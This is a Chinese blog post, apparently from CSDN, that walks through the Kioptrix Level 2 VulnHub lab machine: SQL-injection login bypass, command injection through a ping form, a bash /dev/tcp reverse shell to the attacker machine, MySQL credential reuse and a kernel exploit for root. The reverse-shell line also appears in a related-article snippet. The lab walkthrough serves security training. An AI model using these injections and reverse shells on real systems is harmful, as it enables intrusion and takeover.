Kioptrix Level 2-writeup

最新推荐文章于 2021-11-24 00:14:06 发布
最新推荐文章于 2021-11-24 00:14:06 发布
阅读量286 收藏
点赞数 1
分类专栏: 渗透 文章标签: 安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43404260/article/details/108116150
版权

Kioptrix Level 2-writeup

0x00 信息收集

目标机器16.16.16.178
kali攻击机16.16.16.177

使用nmap来个端口服务扫描

image-20200819182450574

浏览器打开http://16.16.16.178看看

image-20200819182646519

第一眼看上去就像是存在SQL注入,抓包跑了下果然是存在万能密码的

image-20200819183517827

0x01 漏洞利用

以账号'0 or 1=1 #和任意密码就可以成功登录,登录后的页面是这样,感觉是存在一个任意命令执行的漏洞

image-20200819183651609

ping了下路由

image-20200819183803437

直接使用命令管道符连接命令可以执行任意命令

image-20200819184037164

kali使用nc -lvp 1234监听,直接bash -i >& /dev/tcp/16.16.16.177/1234 0>&1拿shell

image-20200819184705098

image-20200819184827303

不过是个低权限,需要提权

0x02 提权

image-20200819191803956

将shell升级一下python -c 'import pty; pty.spawn("/bin/bash")'

登录mysql

mysql -u john -phiroshima

在mysql数据库的user表找到了mysql的root密码hash

image-20200819201054129

在线查一下是hiroshima

使用root登录mysql

mysql -u root -phiroshima

image-20200819201226963

mysql的root权限是受限的,本来还准备使用system cat /etc/shadow查看下hash值。

只能从别的地方找下线索

从数据库webapp的user表找到web登录界面的账号密码。

image-20200819224411601

试了下ssh,发现密码不对。

思绪一下断了……

突然想到还可以从exp入手呀,赶紧看看版本

uname -a 
lsb_release -a

image-20200819224619794

image-20200819224648964

那就选这个9542吧

在shell下找个可以读写的

image-20200819224956845

获取到root权限。

正道是沧桑
关注
专栏目录
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 594
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
Kioptrix Level 2
cxyzupup的博客
01-10 2076
Kioptrix Level 2 项目地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 提示:靶机网络连接方式使用NAT模式。 文章目录Kioptrix Level 2一、信息收集:1.使用fping工具查找靶机IP:2.使用nmap对目标主机端口进行枚举:二、信息利用:1. 访问http和https服务查看源码并未发现有用信息,因此直接枚举web服务:2. nmap枚举到了该系统使用了mysql,因此可以使用sqlmap进行注入探测3. 使用
Kioptrix Level2
底层社会中的弱智
04-16 899
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
oscp——Kioptrix: Level 1.1 (#2)
王嘟嘟的博客
02-20 1278
0x00 前言 第三十二台机子 0x01 信息收集 0x02 Web80-webshell 访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码 成功进入后台,可以看到是一个执行ping命令的执行窗口 这里反弹一下shell,这里使用 bash -i >& /dev/tcp/192.168.0.111/1234 >&1 然后在/...
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1293
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
Kioptrix_Level_1-writeup
Lee
08-19 643
Kioptrix_Level_1-writeup 0x00 信息收集 目标机器IP 16.16.16.176 kali攻击机 16.16.16.177 //nmap扫描端口服务 nmap -A -Pn 16.16.16.176 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 13:43 CST Nmap scan report for 16.16.16.176 Host is up (0.00081s latency). Not
Zero-level-DFD-one-page-writeup
03-12
标题中的“Zero-level-DFD-one-page-writeup”指的是一个关于数据流程图(Data Flow Diagram, DFD)的文档,特别是零级(Level 0)DFD,以及一个一页的写作,可能是对这个DFD的解释或概述。在这个场景中,DFD是一种...
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
PML-Prediction-Assignment-Writeup
05-31
在本项目中,“PML-Prediction-Assignment-Writeup-main”可能包含用于建模的数据集。 2. 数据预处理:数据预处理是任何建模任务的关键步骤,包括数据清洗(处理缺失值和异常值)、数据转换(如归一化或标准化)...
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1 本文将围绕HFCTF-江苏翔信二队-Writeup1的 Writeup1,详细介绍该挑战题的知识点和解决思路。 首先,让我们来看一下题目的描述和标签。题目描述为空,标签包含“测试软件/插件 ...
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1207
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
vulhub - Kioptrix: Level 1.1 (#2) writeup
Jiajiajiang_的博客
12-12 760
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 找到IP为:172.21.137.47 端口...
funbox-vulnhub靶机-writeup
Lee
08-14 1602
FunBoxWriteup ##0x00 找到目标主机 使用nmap扫描网段,发现目标 nmap -sn 16.16.16.0/24 //发现目标机器IP为16.16.16.157 nmap -A 16.16.16.157 -v //直接nmap全扫 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2
HackInOS靶机渗透writeup
Lee
08-13 1080
HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP。 成功后打开的靶机图如下 0x01渗透过程 使用nmap扫描确定目标机器IP nmap -sn 16.16.16.0/24 //确定目标机器IP为16.16.16.156,并发现8000端口提供web服务 使用浏览器插件header editor将localhost替换成16.16.16.156即可正常打开页面。 通过fuzzing遍历目
SQL SERVER的注入要点
Lee
05-14 524
SQL SERVER的注入要点 一、SQLServer数据库的查询语句 #函数查询 1.select @@version; #查询数据库的版本 2.select host_name(); #查询主机名,如果是用navicat远程连接的话,主机名是本地的名字 3.select db_name(); #查询当前数据库名 4.select user; #查询当前数据库的拥有者,结果为dbo。dbo是每个数据库的默认用户, 具有所有者权限全称:databaseOw
KioptrixVM3-writeup
Lee
08-20 453
KioptrixVM3-writeup 0x00 信息收集 nmap -A -T4 -p 1-65535 16.16.16.180 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 15:16 CST
CyberSploit2-writeup
Lee
08-18 283
CyberSploit2-writeup 0x00 发现目标 导入CyberSploit2.ova文件,配置好网络模式为桥接模式 nmap扫描局域网nmap -sn 16.16.16.0/24发现目标IP是16.16.16.171 使用nmap扫描下端口nmap -sV 16.16.16.171 root@kali:~# nmap -sV 16.16.16.171 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 11:48 CST Nmap sca
Photographer-writeup
Lee
08-18 278
Photographer-writeup 0x00 信息收集 首先使用nmap扫描一下端口及服务 nmap -sV -Pn 192.168.1.21 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 15:56 CST Nmap scan report for 192.168.1.21 Host is up (0.00044s latency). Not shown: 996 closed ports PORT STATE SERVICE
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值